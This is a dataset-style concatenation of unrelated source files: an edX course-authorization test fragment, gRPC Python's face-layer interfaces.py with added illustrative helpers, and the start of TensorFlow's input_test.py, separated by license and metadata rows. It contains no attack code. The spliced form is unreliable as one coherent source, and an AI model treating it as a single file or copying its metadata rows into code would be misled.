course_id = SlashSeparatedCourseKey('blahx', 'blah101', 'ehhhhhhh')
# Test that course is authorized by default, since auth is turned off
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
# Use the admin interface to unauthorize the course
cauth = CourseAuthorization(course_id=course_id, email_enabled=False)
cauth.save()
# Now, course should STILL be authorized!
self.assertTrue(CourseAuthorization.instructor_email_enabled(course_id))
| agpl-3.0 | -1,810,809,775,772,614,400 | 38.810811 | 98 | 0.668534 | false |
miselin/grpc | src/python/grpcio/grpc/framework/face/interfaces.py | 2 | 23418 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Interfaces for the face layer of RPC Framework."""
import abc
import enum
import six
# cardinality, style, exceptions, abandonment, future, and stream are
# referenced from specification in this module.
from grpc.framework.common import cardinality # pylint: disable=unused-import
from grpc.framework.common import style # pylint: disable=unused-import
from grpc.framework.face import exceptions # pylint: disable=unused-import
from grpc.framework.foundation import abandonment # pylint: disable=unused-import
from grpc.framework.foundation import future # pylint: disable=unused-import
from grpc.framework.foundation import stream # pylint: disable=unused-import
@enum.unique
class Abortion(enum.Enum):
"""Categories of RPC abortion."""
CANCELLED = 'cancelled'
EXPIRED = 'expired'
NETWORK_FAILURE = 'network failure'
SERVICED_FAILURE = 'serviced failure'
SERVICER_FAILURE = 'servicer failure'
class CancellableIterator(six.with_metaclass(abc.ABCMeta)):
"""Implements the Iterator protocol and affords a cancel method."""
@abc.abstractmethod
def __iter__(self):
"""Returns the self object in accordance with the Iterator protocol."""
raise NotImplementedError()
def __next__(self):
return self.next()
@abc.abstractmethod
def next(self):
"""Returns a value or raises StopIteration per the Iterator protocol."""
raise NotImplementedError()
@abc.abstractmethod
def cancel(self):
"""Requests cancellation of whatever computation underlies this iterator."""
raise NotImplementedError()
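# A minimal illustrative sketch (the class name and callback shape are
# assumptions for this example only): a CancellableIterator that wraps a
# plain iterator and invokes a caller-supplied callable on cancellation.
class _CallbackCancellableIterator(CancellableIterator):
  """Wraps an iterator; cancel() simply invokes the supplied callback."""

  def __init__(self, iterator, cancel_callback):
    self._iterator = iterator
    self._cancel_callback = cancel_callback

  def __iter__(self):
    return self

  def next(self):
    # Draws the next value from the wrapped iterator per the Iterator
    # protocol; StopIteration propagates unchanged.
    return next(self._iterator)

  def cancel(self):
    # Signals whatever computation feeds the wrapped iterator to stop.
    self._cancel_callback()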
class RpcContext(six.with_metaclass(abc.ABCMeta)):
"""Provides RPC-related information and action."""
@abc.abstractmethod
def is_active(self):
"""Describes whether the RPC is active or has terminated."""
raise NotImplementedError()
@abc.abstractmethod
def time_remaining(self):
"""Describes the length of allowed time remaining for the RPC.
Returns:
A nonnegative float indicating the length of allowed time in seconds
remaining for the RPC to complete before it is considered to have timed
out.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_abortion_callback(self, abortion_callback):
"""Registers a callback to be called if the RPC is aborted.
Args:
abortion_callback: A callable to be called and passed an Abortion value
in the event of RPC abortion.
"""
raise NotImplementedError()
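# A small illustrative helper, not a prescribed usage pattern: it registers
# an abortion callback on an RpcContext and reports whether the RPC is still
# active with at least seconds_needed of allowed time left. The threshold
# argument is an assumption made for this example only.
def _context_allows(rpc_context, seconds_needed, abortion_callback):
  rpc_context.add_abortion_callback(abortion_callback)
  return rpc_context.is_active() and (
      rpc_context.time_remaining() >= seconds_needed)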
class Call(six.with_metaclass(abc.ABCMeta)):
"""Invocation-side representation of an RPC.
Attributes:
context: An RpcContext affording information about the RPC.
"""
@abc.abstractmethod
def cancel(self):
"""Requests cancellation of the RPC."""
raise NotImplementedError()
class UnaryUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-unary RPC in any call style."""
@abc.abstractmethod
def __call__(self, request, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(self, request, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future's result value will be the response value of the RPC.
In the event of RPC abortion, the returned Future's exception value
will be an exceptions.RpcError.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, request, response_callback, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
      response_callback: A callback to be called to accept the response value
of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
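# A compact illustration of the three call styles a UnaryUnaryMultiCallable
# offers; multi_callable, request and both callbacks are assumed to be
# supplied by a concrete front-end that this sketch does not create.
def _demonstrate_unary_unary_styles(multi_callable, request, timeout):
  # Blocking style: returns the response or raises exceptions.RpcError.
  response = multi_callable(request, timeout)
  # Future style: the returned future.Future resolves to the response value.
  response_future = multi_callable.future(request, timeout)
  # Event style: callbacks receive the response value or an Abortion value.
  call = multi_callable.event(
      request, lambda response_value: None, lambda abortion: None, timeout)
  return response, response_future, call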
class UnaryStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-stream RPC in any call style."""
@abc.abstractmethod
def __call__(self, request, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion
of the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, request, response_consumer, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
      response_consumer: A stream.Consumer to be called to accept the response
values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
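# An illustrative consumer of the blocking unary-stream style: it draws a
# bounded number of responses and then cancels the RPC. The limit is an
# arbitrary value chosen only for this example.
def _take_some_responses(unary_stream_multi_callable, request, timeout,
                         limit=5):
  responses = []
  response_iterator = unary_stream_multi_callable(request, timeout)
  for response in response_iterator:
    responses.append(response)
    if len(responses) >= limit:
      response_iterator.cancel()
      break
  return responses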
class StreamUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-unary RPC in any call style."""
@abc.abstractmethod
def __call__(self, request_iterator, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(self, request_iterator, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future's result value will be the response value of the RPC.
In the event of RPC abortion, the returned Future's exception value
will be an exceptions.RpcError.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, response_callback, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
Args:
      response_callback: A callback to be called to accept the response value
        of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
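# An illustrative sketch of the event style for stream-request methods: the
# invocation returns a Call plus a stream.Consumer into which the caller
# feeds request values. The request_values iterable is assumed to be
# supplied by the caller for this example.
def _send_stream_unary_event(stream_unary_multi_callable, request_values,
                             response_callback, abortion_callback, timeout):
  call, request_consumer = stream_unary_multi_callable.event(
      response_callback, abortion_callback, timeout)
  for request_value in request_values:
    request_consumer.consume(request_value)
  request_consumer.terminate()
  return call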
class StreamStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-stream RPC in any call style."""
@abc.abstractmethod
def __call__(self, request_iterator, timeout):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion
of the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event(self, response_consumer, abortion_callback, timeout):
"""Asynchronously invokes the underlying RPC.
    Args:
      response_consumer: A stream.Consumer to be called to accept the response
        values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
class MethodImplementation(six.with_metaclass(abc.ABCMeta)):
"""A sum type that describes an RPC method implementation.
Attributes:
cardinality: A cardinality.Cardinality value.
style: A style.Service value.
unary_unary_inline: The implementation of the RPC method as a callable
value that takes a request value and an RpcContext object and returns a
response value. Only non-None if cardinality is
cardinality.Cardinality.UNARY_UNARY and style is style.Service.INLINE.
unary_stream_inline: The implementation of the RPC method as a callable
value that takes a request value and an RpcContext object and returns an
iterator of response values. Only non-None if cardinality is
cardinality.Cardinality.UNARY_STREAM and style is style.Service.INLINE.
stream_unary_inline: The implementation of the RPC method as a callable
value that takes an iterator of request values and an RpcContext object
and returns a response value. Only non-None if cardinality is
cardinality.Cardinality.STREAM_UNARY and style is style.Service.INLINE.
stream_stream_inline: The implementation of the RPC method as a callable
value that takes an iterator of request values and an RpcContext object
and returns an iterator of response values. Only non-None if cardinality
is cardinality.Cardinality.STREAM_STREAM and style is
style.Service.INLINE.
unary_unary_event: The implementation of the RPC method as a callable value
that takes a request value, a response callback to which to pass the
response value of the RPC, and an RpcContext. Only non-None if
cardinality is cardinality.Cardinality.UNARY_UNARY and style is
style.Service.EVENT.
unary_stream_event: The implementation of the RPC method as a callable
value that takes a request value, a stream.Consumer to which to pass the
      response values of the RPC, and an RpcContext. Only non-None if
cardinality is cardinality.Cardinality.UNARY_STREAM and style is
style.Service.EVENT.
stream_unary_event: The implementation of the RPC method as a callable
value that takes a response callback to which to pass the response value
of the RPC and an RpcContext and returns a stream.Consumer to which the
request values of the RPC should be passed. Only non-None if cardinality
is cardinality.Cardinality.STREAM_UNARY and style is style.Service.EVENT.
stream_stream_event: The implementation of the RPC method as a callable
value that takes a stream.Consumer to which to pass the response values
of the RPC and an RpcContext and returns a stream.Consumer to which the
request values of the RPC should be passed. Only non-None if cardinality
is cardinality.Cardinality.STREAM_STREAM and style is
style.Service.EVENT.
"""
class MultiMethodImplementation(six.with_metaclass(abc.ABCMeta)):
"""A general type able to service many RPC methods."""
@abc.abstractmethod
def service(self, name, response_consumer, context):
"""Services an RPC.
Args:
name: The RPC method name.
response_consumer: A stream.Consumer to be called to accept the response
values of the RPC.
context: An RpcContext object.
Returns:
A stream.Consumer with which to accept the request values of the RPC. The
consumer returned from this method may or may not be invoked to
completion: in the case of RPC abortion, RPC Framework will simply stop
passing values to this object. Implementations must not assume that this
object will be called to completion of the request stream or even called
at all.
Raises:
abandonment.Abandoned: May or may not be raised when the RPC has been
aborted.
exceptions.NoSuchMethodError: If this MultiMethod does not recognize the
given RPC method name and is not able to service the RPC.
"""
raise NotImplementedError()
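# NOTE: illustrative sketch only. A concrete MultiMethodImplementation might
# look roughly like the commented outline below; the `self._handlers` registry
# and its call convention are hypothetical, while the `service` signature and
# the returned stream.Consumer follow the docstring above.
#
#   class _ExampleMultiMethod(MultiMethodImplementation):
#     def service(self, name, response_consumer, context):
#       if name not in self._handlers:
#         raise exceptions.NoSuchMethodError(...)
#       return self._handlers[name](response_consumer, context)  # a stream.Consumer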
class GenericStub(six.with_metaclass(abc.ABCMeta)):
"""Affords RPC methods to callers."""
@abc.abstractmethod
def blocking_value_in_value_out(self, name, request, timeout):
"""Invokes a unary-request-unary-response RPC method.
This method blocks until either returning the response value of the RPC
(in the event of RPC completion) or raising an exception (in the event of
RPC abortion).
Args:
name: The RPC method name.
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future_value_in_value_out(self, name, request, timeout):
"""Invokes a unary-request-unary-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future will return an outcome indicating that the RPC returned
the response value of the RPC. In the event of RPC abortion, the
returned Future will return an outcome indicating that the RPC raised
an exceptions.RpcError.
"""
raise NotImplementedError()
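# NOTE: illustrative sketch only. The two unary-unary invocation styles above
# differ in when the caller blocks; `stub`, `request`, and the method name are
# placeholders, and the future's result-retrieval API is assumed rather than
# defined here.
#
#   response = stub.blocking_value_in_value_out('Method', request, timeout=5)
#
#   rpc_future = stub.future_value_in_value_out('Method', request, timeout=5)
#   # ... do other work, then obtain the outcome via the future.Future interface.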
@abc.abstractmethod
def inline_value_in_stream_out(self, name, request, timeout):
"""Invokes a unary-request-stream-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion of
the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def blocking_stream_in_value_out(self, name, request_iterator, timeout):
"""Invokes a stream-request-unary-response RPC method.
This method blocks until either returning the response value of the RPC
(in the event of RPC completion) or raising an exception (in the event of
RPC abortion).
Args:
name: The RPC method name.
request_iterator: An iterator that yields the request values of the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
The response value for the RPC.
Raises:
exceptions.RpcError: Indicating that the RPC was aborted.
"""
raise NotImplementedError()
@abc.abstractmethod
def future_stream_in_value_out(self, name, request_iterator, timeout):
"""Invokes a stream-request-unary-response RPC method.
Args:
name: The RPC method name.
request_iterator: An iterator that yields the request values of the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A future.Future representing the RPC. In the event of RPC completion, the
returned Future will return an outcome indicating that the RPC returned
the response value of the RPC. In the event of RPC abortion, the
returned Future will return an outcome indicating that the RPC raised
an exceptions.RpcError.
"""
raise NotImplementedError()
@abc.abstractmethod
def inline_stream_in_stream_out(self, name, request_iterator, timeout):
"""Invokes a stream-request-stream-response RPC method.
Args:
name: The RPC method name.
request_iterator: An iterator that yields the request values of the RPC.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A CancellableIterator that yields the response values of the RPC and
affords RPC cancellation. Drawing response values from the returned
CancellableIterator may raise exceptions.RpcError indicating abortion of
the RPC.
"""
raise NotImplementedError()
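# NOTE: illustrative sketch only. Stream-response invocations return a
# CancellableIterator, so responses are consumed by ordinary iteration and RPC
# abortion surfaces as exceptions.RpcError; `stub`, `request`, and `handle` are
# placeholders.
#
#   for response in stub.inline_value_in_stream_out('Method', request, timeout=5):
#     handle(response)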
@abc.abstractmethod
def event_value_in_value_out(
self, name, request, response_callback, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-unary-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
response_callback: A callback to be called to accept the response value
of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event_value_in_stream_out(
self, name, request, response_consumer, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-stream-response RPC method.
Args:
name: The RPC method name.
request: The request value for the RPC.
response_consumer: A stream.Consumer to be called to accept the response
values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A Call object for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def event_stream_in_value_out(
self, name, response_callback, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-unary-response RPC method.
Args:
name: The RPC method name.
response_callback: A callback to be called to accept the response value
of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
@abc.abstractmethod
def event_stream_in_stream_out(
self, name, response_consumer, abortion_callback, timeout):
"""Event-driven invocation of a unary-request-stream-response RPC method.
Args:
name: The RPC method name.
response_consumer: A stream.Consumer to be called to accept the response
values of the RPC.
abortion_callback: A callback to be called and passed an Abortion value
in the event of RPC abortion.
timeout: A duration of time in seconds to allow for the RPC.
Returns:
A pair of a Call object for the RPC and a stream.Consumer to which the
request values of the RPC should be passed.
"""
raise NotImplementedError()
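# NOTE: illustrative sketch only. Event-driven stream-request invocations hand
# responses to the supplied callbacks and return a consumer for feeding request
# values; all names below are placeholders, and the stream.Consumer methods used
# are assumptions rather than definitions made in this module.
#
#   call, request_consumer = stub.event_stream_in_stream_out(
#       'Method', response_consumer, abortion_callback, timeout=5)
#   for request in requests:
#     request_consumer.consume(request)
#   request_consumer.terminate()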
@abc.abstractmethod
def unary_unary_multi_callable(self, name):
"""Creates a UnaryUnaryMultiCallable for a unary-unary RPC method.
Args:
name: The RPC method name.
Returns:
A UnaryUnaryMultiCallable value for the named unary-unary RPC method.
"""
raise NotImplementedError()
@abc.abstractmethod
def unary_stream_multi_callable(self, name):
"""Creates a UnaryStreamMultiCallable for a unary-stream RPC method.
Args:
name: The RPC method name.
Returns:
A UnaryStreamMultiCallable value for the named unary-stream RPC method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_unary_multi_callable(self, name):
"""Creates a StreamUnaryMultiCallable for a stream-unary RPC method.
Args:
name: The RPC method name.
Returns:
A StreamUnaryMultiCallable value for the named stream-unary RPC method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_stream_multi_callable(self, name):
"""Creates a StreamStreamMultiCallable for a stream-stream RPC method.
Args:
name: The RPC method name.
Returns:
A StreamStreamMultiCallable value for the named stream-stream RPC method.
"""
raise NotImplementedError()
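# NOTE: illustrative sketch only. The multi-callable factories bind a method
# name once so it can be invoked repeatedly; the call signature of the returned
# multi-callable is defined elsewhere, so it is only hinted at here. `stub` and
# 'Method' are placeholders.
#
#   unary_unary = stub.unary_unary_multi_callable('Method')
#   # ... later, invoke `unary_unary` with a request per its own interface.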
class DynamicStub(six.with_metaclass(abc.ABCMeta)):
"""A stub with RPC-method-bound multi-callable attributes.
Instances of this type respond to attribute access as follows: if the
requested attribute is the name of a unary-unary RPC method, the value of the
attribute will be a UnaryUnaryMultiCallable with which to invoke the RPC
method; if the requested attribute is the name of a unary-stream RPC method,
the value of the attribute will be a UnaryStreamMultiCallable with which to
invoke the RPC method; if the requested attribute is the name of a
stream-unary RPC method, the value of the attribute will be a
StreamUnaryMultiCallable with which to invoke the RPC method; and if the
requested attribute is the name of a stream-stream RPC method, the value of
the attribute will be a StreamStreamMultiCallable with which to invoke the
RPC method.
"""
| bsd-3-clause | 6,527,837,977,558,582,000 | 35.936909 | 82 | 0.718507 | false |
brchiu/tensorflow | tensorflow/python/training/input_test.py | 2 | 94178 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training.input."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import os
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test as test_lib
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import input as inp
from tensorflow.python.training import queue_runner_impl
from tensorflow.python.util import compat
class MatchFilenamesOnceTest(test_lib.TestCase):
def test(self):
temp_dir = self.get_temp_dir()
filenames = [os.path.join(temp_dir, n) for n in os.listdir(temp_dir)]
additional = [
os.path.join(self.get_temp_dir(), "match_filenames.%d" % i)
for i in range(3)
]
for name in additional:
open(name, "w").write("Some contents")
filenames = list(set(filenames + additional))
with self.cached_session():
star = inp.match_filenames_once(os.path.join(self.get_temp_dir(), "*"))
question = inp.match_filenames_once(
os.path.join(self.get_temp_dir(), "match_filenames.?"))
one = inp.match_filenames_once(additional[1])
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
self.assertItemsEqual(
map(compat.as_bytes, filenames), self.evaluate(star))
self.assertItemsEqual(
map(compat.as_bytes, additional), self.evaluate(question))
self.assertItemsEqual([compat.as_bytes(additional[1])],
self.evaluate(one))
class LimitEpochsTest(test_lib.TestCase):
def testNoLimit(self):
with self.cached_session():
seven = constant_op.constant(7)
seven_forever = inp.limit_epochs(seven)
variables.local_variables_initializer().run()
for _ in range(100):
self.assertEqual(7, self.evaluate(seven_forever))
def testLimit(self):
with self.cached_session():
love_me = constant_op.constant("Love Me")
love_me_two_times = inp.limit_epochs(love_me, num_epochs=2)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
self.assertEqual(b"Love Me", self.evaluate(love_me_two_times))
self.assertEqual(b"Love Me", self.evaluate(love_me_two_times))
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(love_me_two_times)
class InputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session():
input_tensor = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
num_epochs = 2
queue = inp.input_producer(
input_tensor, num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(len(input_tensor) * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
self.assertAllEqual(input_tensor * num_epochs,
self.evaluate(dequeue_many))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testNoShapeInference(self):
with self.cached_session():
# Disable shape inference for the input.
input_value = [[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]]
input_tensor = array_ops.placeholder_with_default(input_value, shape=None)
num_epochs = 2
queue = inp.input_producer(
input_tensor, element_shape=[4], num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(len(input_value) * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
self.assertAllEqual(input_value * num_epochs, self.evaluate(dequeue_many))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testShapeError(self):
input_tensor = array_ops.placeholder(dtypes.float32, None)
with self.assertRaisesRegexp(ValueError, "fully defined shape"):
_ = inp.input_producer(input_tensor)
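# NOTE: illustrative sketch only, not part of the original test suite. It
# mirrors the producer/dequeue pattern exercised above; the helper name is
# ours, not TensorFlow API. Callers must still run the global/local variable
# initializers and queue_runner_impl.start_queue_runners() before evaluating
# the dequeue op, exactly as the tests do.
def _example_input_producer_pipeline(input_tensor, num_epochs=2):
  """Builds a non-shuffling input_producer and returns (queue, dequeue_op)."""
  queue = inp.input_producer(input_tensor, num_epochs=num_epochs, shuffle=False)
  return queue, queue.dequeue()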
class StringInputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session():
strings = [b"to", b"be", b"or", b"not", b"to", b"be"]
num_epochs = 3
queue = inp.string_input_producer(
strings, num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(len(strings) * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
output = self.evaluate(dequeue_many)
self.assertAllEqual(strings * num_epochs, output)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testShuffle(self):
with self.cached_session():
strings = [b"a", b"b", b"c"]
num_epochs = 600
queue = inp.string_input_producer(
strings, num_epochs=num_epochs, shuffle=True, seed=271828)
dequeue_many = queue.dequeue_many(len(strings))
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Validate that we only shuffle the strings within an epoch and
# count how often each possible order appears.
expected = [b"abc", b"acb", b"bac", b"bca", b"cab", b"cba"]
frequency = {}
for e in expected:
frequency[e] = 0
for _ in range(num_epochs):
output = self.evaluate(dequeue_many)
key = b"".join(output)
self.assertIn(key, expected)
frequency[key] += 1
# Expect an approximately even distribution over all possible orders.
expected_frequency = num_epochs / len(expected)
margin = expected_frequency * 0.4
tf_logging.info("Observed counts: %s", frequency)
for key in expected:
value = frequency[key]
self.assertGreater(value, expected_frequency - margin)
self.assertLess(value, expected_frequency + margin)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testNullStringPython(self):
# Graph-construction time check for empty string list:
with self.cached_session():
with self.assertRaises(ValueError):
_ = inp.string_input_producer([])
def testNullString(self):
# Runtime check for empty string list. This is slightly oblique:
# The queue runner should die with an assertion error on the null
# input tensor, causing the dequeue to fail with an OutOfRangeError.
with self.cached_session():
coord = coordinator.Coordinator()
queue = inp.string_input_producer(
constant_op.constant(
[], dtype=dtypes.string))
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners(coord=coord)
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
coord.request_stop()
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
strings = [b"to", b"be", b"or", b"not", b"to", b"be"]
queue = inp.string_input_producer(
strings, shared_name="SHARED_NAME_XYZ", name="Q")
self.assertProtoEquals("s: 'SHARED_NAME_XYZ'",
queue.queue_ref.op.node_def.attr["shared_name"])
def testConstructionRace(self):
with self.cached_session() as sess:
strings = [b"to", b"be", b"or", b"not", b"to", b"be"]
queue = inp.string_input_producer(strings, shuffle=False)
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(sess=sess, coord=coord)
for _ in range(2):
for string in strings:
# NOTE(mrry): This is not the recommended way to write
# dequeuing code (instead you should create a single dequeue
# op before starting the queue runners, and run it
# repeatedly), because it leads to concurrent reading and
# writing of the `tf.Graph` object. However, many users
# write code this way, so we include this test to ensure
# that we can support it.
self.assertEquals(string, sess.run(queue.dequeue()))
coord.request_stop()
coord.join(threads)
class RangeInputProducerTest(test_lib.TestCase):
def testNoShuffle(self):
with self.cached_session():
num_epochs = 3
range_size = 5
queue = inp.range_input_producer(
range_size, num_epochs=num_epochs, shuffle=False)
dequeue_many = queue.dequeue_many(range_size * num_epochs)
dequeue = queue.dequeue()
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# No randomness, so just see repeated copies of the input.
output = self.evaluate(dequeue_many)
self.assertAllEqual(list(xrange(range_size)) * num_epochs, output)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeue)
for thread in threads:
thread.join()
def testShuffle(self):
with self.cached_session():
num_epochs = 200
range_size = 2
queue = inp.range_input_producer(
range_size, num_epochs=num_epochs, shuffle=True, seed=314159)
dequeue_many = queue.dequeue_many(range_size)
dequeue = queue.dequeue()
